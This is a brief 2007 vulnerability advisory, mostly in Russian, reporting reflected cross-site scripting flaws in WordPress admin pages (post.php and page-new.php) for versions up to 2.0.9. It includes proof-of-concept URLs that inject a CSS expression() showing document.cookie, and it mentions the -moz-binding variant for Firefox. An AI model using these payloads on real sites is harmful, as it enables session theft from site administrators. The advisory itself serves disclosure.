Cross-Site Scripting vulnerabilities in WordPress

2007-12-24T00:00:00
ID SECURITYVULNS:DOC:18714
Type securityvulns
Reporter Securityvulns
Modified 2007-12-24T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в WordPress.

XSS:

http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22

http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22

Это примеры для Internet Explorer. Для исполнения кода в Mozilla и Firefox может быть использован "-moz-binding".

Уязвимы версии WordPress <= 2.0.9. Версия WP 2.0.11 неуязвима.

Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/1658/

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua